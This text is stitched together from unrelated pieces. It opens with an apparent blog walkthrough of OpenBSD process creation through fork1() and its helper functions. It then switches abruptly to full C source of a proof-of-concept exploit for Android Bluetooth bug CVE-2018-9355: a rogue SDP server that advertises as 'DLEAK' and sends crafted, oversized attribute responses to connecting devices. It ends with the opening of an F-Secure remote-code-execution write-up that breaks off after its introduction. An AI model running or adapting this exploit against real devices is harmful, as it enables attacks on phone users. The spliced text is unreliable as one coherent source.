OpenBSD Kernel Internals — Creation of a Process from User Space to Kernel Space

GDB + QEMU (environment)

Hello readers,

I know this post is a little late, but I have been busy with some other professional work. 🙂

This time, let's discuss process creation in the OpenBSD operating system, from user space down to kernel space.

We will take the example of a user-space process launched from the command line interface (console), for example "ls", and look at what happens in kernel space as a result.

I will divide this series into 3 parts: creation, execution, and exit. The creation of a process itself took me some time to learn, because analyzing and tracking it from user space to kernel space had to be done line by line.

I have used gdb to debug the process and analyze it line by line.

Now, I will not waste your time too much.

Let's dive in from user space to kernel space and see the beauty of the puffer.

I have divided the whole flow and the kernel functions involved into points, so I think it will be easy to read and learn from.

Now, suppose you have launched the "ls" command from the CLI (xterm):

Here, the parent process is "ksh", the default shell in OpenBSD, which invokes "ls" or any other command.

Every process is created by sys_fork(), that is, the fork system call, which internally calls fork1().

fork1 — kernel developer’s manual

fork1() creates a new process out of p1, which should be the current thread. This function is used primarily to implement the fork(2) and vfork(2) system calls, as well as the kthread_create(9) function.

Life cycle of a process (in brief):

“ls” → fork(2) → sys_fork() → fork1() → sys_execve() → sys_exit() → exit1()
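In user space, that life cycle corresponds to just a few libc calls. Below is a minimal sketch of what ksh effectively does to run "ls" (my own illustration, not ksh source; error handling omitted):

/* Minimal user-space sketch of the fork/exec/exit cycle (illustration only). */
#include <sys/wait.h>
#include <unistd.h>

int
main(void)
{
	pid_t pid = fork();		/* -> sys_fork() -> fork1() in the kernel */

	if (pid == 0) {
		char *argv[] = { "ls", NULL };
		execvp("ls", argv);	/* -> sys_execve() */
		_exit(127);		/* exec failed; exiting -> sys_exit() -> exit1() */
	}
	waitpid(pid, NULL, 0);		/* the parent waits for "ls" to finish */
	return 0;
}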

Under the hood working of fork1()

From user space, the shell's call to fork() (libc) traps into the kernel and lands in sys_fork().

sys_fork()

FORK_FORK: It is a macro which indicates that the call was made by the fork(2) system call. It is used only for statistics.

#define FORK_FORK 0x00000001

  • So, the value of the flags variable is set to 1 (FORK_FORK), because the call was made by fork(2).
  • Check for PTRACING; if the parent is being traced, also set the ptrace-related fork flag. Then hand over to fork1(), as sketched below.
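Putting those two bullets together, here is a paraphrased sketch of sys_fork(). This is not the verbatim OpenBSD source: the helper parent_is_being_ptraced() is a hypothetical stand-in for the real ptrace check, and the real fork1() takes more arguments.

/* Paraphrased sketch of sys_fork(); simplified, not the verbatim source. */
int
sys_fork(struct proc *p, void *v, register_t *retval)
{
	int flags;

	flags = FORK_FORK;		/* statistics only: the call came from fork(2) */
	if (parent_is_being_ptraced(p))	/* hypothetical helper standing in for the real check */
		flags |= FORK_PTRACE;	/* let the tracer follow the fork */
	return fork1(p, flags, retval);	/* simplified: the real fork1() takes more arguments */
}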

Now, fork1()

fork1() initial code
  • In the code above, curp->p_p->ps_comm is "ksh", that is, the parent process which will fork "ls" (user space).
  • First some process structures are declared; then the uid is set:
    uid = curp->p_ucred->cr_ruid, that is, the real user id of the caller.
  • Then the structure for process address space information.
  • Then some variables, the ptrace_state structure, and a few sanity checks using KASSERT.
  • fork_check_maxthread(uid) → it is used to check or track the number of threads created by the given uid.
  • It checks that the number of threads created by this uid is not greater than the maximum number of threads allowed, or maxthread - 5 for non-root users, because the last 5 slots out of maxthread are reserved for root.
  • If the limit is exceeded, it prints the message "table full" at most once every 10 seconds. Otherwise, it increments the number of threads (a paraphrased sketch of this function follows below).
fork_check_maxthread(uid)
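In paraphrased form, fork_check_maxthread() looks roughly like this (a sketch, not the verbatim source; fork_tfmrate is the rate limit behind the 10-second interval mentioned above):

/* Paraphrased sketch of fork_check_maxthread(); not the verbatim source. */
int
fork_check_maxthread(uid_t uid)
{
	/* Don't let a non-root uid use the last 5 thread slots. */
	if ((nthreads >= maxthread - 5 && uid != 0) || nthreads >= maxthread) {
		static struct timeval lasttfm;

		/* print "table full" at most once every 10 seconds */
		if (ratecheck(&lasttfm, &fork_tfmrate))
			tablefull("thread");
		return EAGAIN;
	}
	nthreads++;
	return 0;
}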
  • Now, after fork_check_maxthread(), the same kind of accounting happens again, this time for processes. If you want, you can have a look at the fork1 code screenshot.

Now, let's proceed further.

fork1() code continued
  • It changes the per-user process count via chgproccnt(uid, 1).
chgproccnt()
  • The uidinfo structure maintains per-uid resource consumption counts, including the process count and socket buffer space usage.
  • uid_find function looks up and returns the uidinfo structure for uid. If no uidinfo structure exists for uid, a new structure will be allocated and initialized.

Then, it increments ui_proccnt, that is, the number of processes, by diff and returns the count.
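In paraphrased form, chgproccnt() is small (a sketch, not the verbatim source):

/* Paraphrased sketch of chgproccnt(); not the verbatim source. */
int
chgproccnt(uid_t uid, int diff)
{
	struct uidinfo *uip;

	uip = uid_find(uid);		/* look up (or create) the per-uid record */
	uip->ui_proccnt += diff;	/* +1 on fork, -1 when backing out or exiting */
	return uip->ui_proccnt;		/* the caller compares this against the limit */
}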

After that, it checks for a non-privileged uid whose process count is greater than the soft limit on the number of processes, which is 9223372036854775807 from what I have found in gdb.

Have a look in the below screen-shot for the proper view of values:

(ddd) gdb output for resource limit

If the uid is non-privileged and the count exceeds the maximum resource limit, it backs out: the count is decreased again via chgproccnt() with -1 as the diff parameter, and the numbers of processes and threads are decremented as well.

  • Next, the uvm_uarea_alloc() function allocates a thread’s ‘uarea’, the memory where its kernel stack and PCB are stored.

Now, it checks whether the uaddr variable actually received a thread address; if it is zero (the allocation failed), it decrements the process and thread counts again.

Now, there are the some important functions:

→ thread_new(struct proc *parent, vaddr_t uaddr)

→ process_new(struct proc *p, struct process *parent, int flags)

thread_new(curp, uaddr)

Here, in the thread_new function, we get the new thread for our user-space process, in our case "ls". The proc structure is taken from the pool of processes, proc_pool, via the pool_get() function.

Then, we set the state of the thread to SIDL, which means that the process/thread is being created by fork. We then set p->p_flag = 0.

Now, a section of the new proc structure is zeroed. See the code snippet below from sys/proc.h:

code snippet for members that will be zeroed upon creation in fork, via memset

In the above code snippet, all of those members are zeroed via memset upon creation in fork.

Then, the section from parent->p_startcopy to
p->p_startcopy is copied via memcpy. Have a look at the screenshot below to see which field members are copied.

code snippet for the members that will be copied upon creation in fork
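The zeroing and copying themselves are just two statements in thread_new(); roughly (a sketch using the p_startzero/p_endzero and p_startcopy/p_endcopy marker fields from sys/proc.h):

/* Zero the p_startzero..p_endzero region, copy the p_startcopy..p_endcopy region. */
memset(&p->p_startzero, 0,
    (caddr_t)&p->p_endzero - (caddr_t)&p->p_startzero);
memcpy(&p->p_startcopy, &parent->p_startcopy,
    (caddr_t)&p->p_endcopy - (caddr_t)&p->p_startcopy);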
  • Then, crhold(p->p_ucred) increments the reference count in the struct ucred structure, that is, p->p_ucred->cr_ref++ .
  • Now, the thread's uaddr is cast to (struct user *) and saved as the kernel virtual address of the u-area.
  • Now, it will initialize the timeout.

dummy function to show the timeout_set function working.

timeout_set(timeout, b, argument)

It initializes the timeout structure so that, when the timeout fires, function b is called with argument .

void
timeout_set(struct timeout *new, void (*fn)(void *), void *arg)
{
        new->to_func = fn;
        new->to_arg = arg;
        new->to_flags = TIMEOUT_INITIALIZED;
}

scheduler_fork_hook(parent, p): It is a macro which updates the child's p_estcpu from the parent's p_estcpu.

p_estcpu holds an estimate of the amount of CPU that the process has used recently

/* Inherit the parent’s scheduler history */
#define scheduler_fork_hook(parent, child) do {    \
 (child)->p_estcpu = (parent)->p_estcpu;           \
} while (0)

Then, the newly created thread p is returned.

Now, another important function is process_new(), which creates the process in a similar fashion to what we have seen above in the thread_new function.

  • process_new(struct proc *p, struct process *parent, int flags)
process_new(p,curpr,flags)

In the above code snippet, the same pattern repeats: a process is taken from process_pool via pool_get, then partly zeroed using memset and partly copied using memcpy.

So, for the detailed explanation, please go through the thread_new() function first.

Next is initialization of process using process_initialize function.

process_initialize(pr, p)

ps_mainproc : It is the original and main thread in the process. It’s only special for the handling of p_xstat and some signal and ptrace behaviours that need to be fixed.

→ Copy the initial thread, that is, p, to pr->ps_mainproc.

→ Initialize the queue referenced by head; here, head is pr->ps_threads. Then insert elm at the TAIL of the queue; here, elm is p.

→set the number of references to 1, that is, pr->ps_refcnt = 1

→ Point the initial thread back at its process, that is, p->p_p = pr.

→set the same creds for process as the initial thread.

→condition check for the new thread and the new process via KASSERT.

→Initialize the List referenced by head. Here, head is pr->ps_children

→ Again, initialize a timeout (for details, see thread_new; a combined sketch of process_initialize() follows below).
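Putting the arrows above together, here is a paraphrased sketch of process_initialize() (not the verbatim source; the timeout member and callback names are as I recall them from the source):

/* Paraphrased sketch of process_initialize(); not the verbatim source. */
static void
process_initialize(struct process *pr, struct proc *p)
{
	/* initialize the thread links */
	pr->ps_mainproc = p;
	TAILQ_INIT(&pr->ps_threads);
	TAILQ_INSERT_TAIL(&pr->ps_threads, p, p_thr_link);
	pr->ps_refcnt = 1;

	/* point the initial thread at its process */
	p->p_p = pr;

	/* give the process the same creds as the initial thread */
	pr->ps_ucred = p->p_ucred;
	crhold(pr->ps_ucred);
	KASSERT(p->p_ucred->cr_ref >= 2);	/* new thread and new process */

	LIST_INIT(&pr->ps_children);

	timeout_set(&pr->ps_realit_to, realitexpire, pr);	/* real interval timer */
}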

Now, after the process initialization, pid allocation takes place.

pr->ps_pid = allocpid(); allocpid() returns an unused pid

allocpid() internally calls arc4random_uniform(), which again calls arc4random(); the fully randomized number that comes back is used as the pid.

Then, to make sure the pid is unused, it verifies whether the new pid is already taken by any process. It checks, one by one, the processes, process groups, and zombie processes, using the function ispidtaken(pid_t pid), which internally calls these functions:

  • prfind(pid_t pid) : Locate a process by number
  • pgfind(pid_t pgid) : Locate a process group by number
  • zombiefind(pid_t pid) : Locate a zombie process by number
code snippet for allocpid and ispidtaken
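In paraphrased form, the pid allocation loop looks roughly like this (a sketch, not the verbatim source; the real allocpid() has a few extra details):

/* Paraphrased sketch of allocpid() and ispidtaken(); not the verbatim source. */
pid_t
allocpid(void)
{
	pid_t pid;

	do {
		pid = 1 + arc4random_uniform(PID_MAX);	/* fully randomized pid */
	} while (ispidtaken(pid));			/* retry until it is unused */

	return pid;
}

int
ispidtaken(pid_t pid)
{
	return prfind(pid) != NULL ||		/* live process with this pid?  */
	    pgfind(pid) != NULL ||		/* process group with this id?  */
	    zombiefind(pid) != NULL;		/* zombie waiting to be reaped? */
}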

Now, store the pointer to the parent process in pr->ps_pptr .

Increment the reference count in the process limit structure, that is, struct plimit .

Store the vnode of the parent's executable into pr->ps_textvp , that is, pr->ps_textvp = parent->ps_textvp; .

if (pr->ps_textvp)
        vref(pr->ps_textvp); /* vref --> vnode reference */

The code snippet above means: if a valid vnode is found, increment the v_usecount variable inside the executable's struct vnode structure.

Now, the calculation for setting up process flags:

pr->ps_flags = parent->ps_flags & (PS_SUGID | PS_SUGIDEXEC | PS_PLEDGE | PS_EXECPLEDGE | PS_WXNEEDED);
pr->ps_flags = parent->ps_flags & (0x10 | 0x20 | 0x100000 | 0x400000 | 0x200000)
if (vnode of controlling terminal != NULL)
        pr->ps_flags |= parent->ps_flags & PS_CONTROLT;

process_new continued…

Checks:

* if child_able_to_share_file_descriptor_table_with_parent:
         pr->ps_fd = fdshare(parent)      /* share the table */
  else
         pr->ps_fd = fdcopy(parent)       /* copy the table */
* if child_able_to_share_the_parent's_signal_actions:
         pr->ps_sigacts = sigactsshare(parent) /* share */
  else
         pr->ps_sigacts = sigactsinit(parent)  /* copy */
* if child_able_to_share_the_parent's_addr_space:
         pr->ps_vmspace = uvmspace_share(parent)
  else
         pr->ps_vmspace = uvmspace_fork(parent)
* if process_able_to_start_profiling:
         startprofclock(pr);    /* start profiling on a process */
* if check_child_able_to_start_ptracing:
         pr->ps_flags |= parent->ps_flags & PS_PTRACED
* if check_no_signal_or_zombie_at_exit:
         pr->ps_flags |= PS_NOZOMBIE   /* No signal or zombie at exit */
* if check_signals_stat_swapping:
         pr->ps_flags |= PS_SYSTEM

Then update pr->ps_flags by ORing in PS_EMBRYO, that is,
pr->ps_flags |= PS_EMBRYO   /* New process, not yet fledged */

membar_producer() → Force visibility of all of the above changes.

— All stores preceding the memory barrier will reach global visibility before any stores after the memory barrier reach global visibility.

In short, I think it is used to forcefully make visible changes globally.

Now, insert the new element, that is, pr, at the head of the list. Here, the head is allprocess.

  • return pr

fork1() continued…

Substructures:
p->p_fd and p->p_vmspace are copied directly from pr->ps_fd and pr->ps_vmspace.

substructures

Checks:

** if (process_has_no_signals_stats_or_swapping) then atomically set the bits:

atomic_setbits_int(&pr->ps_flags, PS_SYSTEM);

** if (the child suspends the parent process until the child terminates (by calling _exit(2) or abnormally) or makes a call to execve(2)) then atomically set the bits:

atomic_setbits_int(&pr->ps_flags, PS_PPWAIT);
atomic_setbits_int(&curpr->ps_flags, PS_ISPWAIT);

#ifdef KTRACE
/* Some KTRACE related things */
#endif

cpu_fork(curp, p, NULL, NULL, func, arg ? arg : p)

— To create or update the PCB and make the child ready to RUN.

/*
 * Finish creating the child thread. cpu_fork() will copy
 * and update the pcb and make the child ready to run. The
 * child will exit directly to user mode via child_return()
 * on its first time slice and will not return here.
 */

Address space:
vm = pr->ps_vmspace

if (the call was made by the fork syscall) then
        increment the count of fork() system calls, and
        add the new process's data and stack pages to the count of vm pages affected by fork().
else if (the call was made by the vfork() syscall) then
        do the same as for fork, but for the vfork counters.
else
        increment the number of kernel threads created.

Check:

If (the process is being traced && it was created by the fork system call) then
{
        malloc(9) allocates uninitialized memory in the kernel address space for an object whose size is specified by size, here sizeof(*newptstat), where newptstat is a struct ptrace_state *.
}

Next, allocate the thread ID, that is, p->p_tid = alloctid();
alloctid() works in much the same way, calling arc4random() directly and using the tfind() function to check whether the thread ID is already in use (sketched below).
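In paraphrased form (a sketch, not the verbatim source):

/* Paraphrased sketch of alloctid(); not the verbatim source. */
pid_t
alloctid(void)
{
	pid_t tid;

	do {
		tid = arc4random() & TID_MASK;	/* fully random thread id */
	} while (tfind(tid) != NULL);		/* retry while the tid is in use */

	return tid;
}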

* insert the new element p at the head of the allproc list (the list of all threads).
* insert the new element p at the head of the thread hash list.
* insert the new element pr at the head of the process hash list.
* insert the new element pr after the curpr element.
* insert the new element pr at the head of the parent's children list.

fork1() continued…

Again,
If (the process is being PTRACED)
{
        save the parent's process id for the duration of ptracing, that is,
        pr->ps_oppid = curpr->ps_pid.
        If (pointer to the child's parent process != pointer to the current process's parent)
        {
                proc_reparent(pr, curpr->ps_pptr); /* make the current process's parent the new parent of the child pr */
        }
}

Now, check whether newptstat contains an address; in our case, newptstat holds the kernel virtual address returned by malloc(9).
If that is the case, that is, newptstat != NULL, set the ptrace status:
point pr->ps_ptstat at the new ptrace_state structure, then set newptstat to NULL.

→ Update the ptrace status in both the curpr process and the pr process:

curpr->ps_ptstat->pe_report_event = PTRACE_FORK;
pr->ps_ptstat->pe_report_event = PTRACE_FORK;
curpr->ps_ptstat->pe_other_pid = pr->ps_pid;
pr->ps_ptstat->pe_other_pid = curpr->ps_pid;

Now, for the new process set accounting bits and mark it as complete.

  • Get the nanotime as the process start time.
  • Set the accounting flag AFORK, which means the process has forked but not yet execed.
  • Atomically clear the PS_EMBRYO bit, marking the new process as complete.
  • Then check whether the new child was created as an idle thread; if not, make it runnable and add it to a run queue via the fork_thread_start() function (sketched below).
  • If it was created as an idle thread, just record in p_cpu the CPU (passed in arg) it will run on.
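fork_thread_start() itself is short; in paraphrased form (a sketch, not the verbatim source):

/* Paraphrased sketch of fork_thread_start(); not the verbatim source. */
void
fork_thread_start(struct proc *p, struct proc *parent, int flags)
{
	int s;

	SCHED_LOCK(s);
	p->p_stat = SRUN;				/* mark the new thread runnable */
	p->p_cpu = sched_choosecpu_fork(parent, flags);	/* pick a CPU for it */
	setrunqueue(p);					/* put it on that CPU's run queue */
	SCHED_UNLOCK(s);
}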

The memory (kernel virtual address) allocated by malloc for newptstat is then freed via free .

Notify any interested parties about the new process via KNOTE .

Now, update the stats counter for successfully forked.

uvmexp.forks++; /* -->For forks */
if (flags & FORK_PPWAIT)
        uvmexp.forks_ppwait++; /* --> counter for forks where parent waits */
if (flags & FORK_SHAREVM)
        uvmexp.forks_sharevm++; /* --> counter for forks where vmspace is shared */

Now, pass pointer to the new process to the caller.

if (rnewprocp != NULL)
        *rnewprocp = p;
fork1 continued…
  • Having set PS_PPWAIT on the child and PS_ISPWAIT on ourselves (the parent), the parent then goes to sleep on its own process via tsleep() until the child releases it.
  • Check: if the child was started with tracing enabled && the current process is being traced, alert the parent with a SIGTRAP signal.
  • Now, return the child pid to the parent process.
  • return (0)

Then, finally, I have seen in the debugger that after fork1(), control jumps to the sys/arch/amd64/amd64/trap.c file for system call handling and for setting up the trap frame.

Some of the machine-independent (MI) functions are defined in the sys/sys/syscall_mi.h file, such as mi_syscall(), mi_syscall_return(), and mi_child_return().

Then, after the system call handling in trap.c, control passes to the sys_execve system call, which I will explain later (in the second part); I will also explain more about the trap.c code in upcoming posts, as this one has already become quite long.


PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 | A-74016921 | RCE | Critical | Affected versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/** CVE-2018-9355
 *  https://source.android.com/security/bulletin/2018-06-01
 */

#include <errno.h>
#include <stdio.h>      /* printf */
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>     /* memset, strerror */
#include <unistd.h>
#include <arpa/inet.h>  /* htons, ntohs */
#include <sys/socket.h> /* socket, bind, listen, accept, send, recv */
#include <sys/stat.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>


#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define DATA_ELE_SEQ_DESC_TYPE 6
#define UINT_DESC_TYPE 1


#define SIZE_SIXTEEN_BYTES 4
#define SIZE_EIGHT_BYTES 3
#define SIZE_FOUR_BYTES 2
#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6
#define TWO_COMP_INT_DESC_TYPE 2
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;


	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;

}

static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	//*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	//pkt++;

	for (i = 0; i < 31; i++) {
		*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		*pkt = (UUID_DESC_TYPE << 3) | SIZE_SIXTEEN_BYTES;
		pkt++;
		pkt = place_uid(pkt, i);
	}
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	}
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);
	pkt++;

	return retsize;

}

static size_t do_fake_svcsar(uint8_t *pkt)
{

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	*pkt |= SIZE_EIGHT_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 1;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
		status = SDP_INVALID_SYNTAX;
		break;
	}
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}


static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {
			continue;
		}

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			continue;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			continue;
		}

		if (!count) {
			process_request(buf, fd);
			count ++;
		}
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
			count++;
		}

		free(buf);
	}
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);

	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	printf("Device should be advertising under DLEAK\n");
	return NULL;
}



int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;


	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			i--;
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			continue;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}
}

F-Secure Anti-Virus: Remote Code Execution via Solid RAR Unpacking

As I briefly mentioned in my last two posts about the 7-Zip bugs CVE-2017-17969, CVE-2018-5996, and CVE-2018-10115, the products of at least one antivirus vendor were affected by those bugs. Now that all patches have been rolled out, I can finally make the vendor’s name public: It is F-Secure with all of its Windows-based endpoint protection products (including consumer products such as F-Secure Anti-Virus as well as corporate products such as F-Secure Server Security).

Even though F-Secure products are directly affected by the mentioned 7-Zip bugs, exploitation is substantially more difficult than it was in 7-Zip (before version 18.05), because F-Secure properly deploys ASLR. In this post, I am presenting an extension to my previous 7-Zip exploit of CVE-2018-10115 that achieves Remote Code Execution on F-Secure products.

Introduction

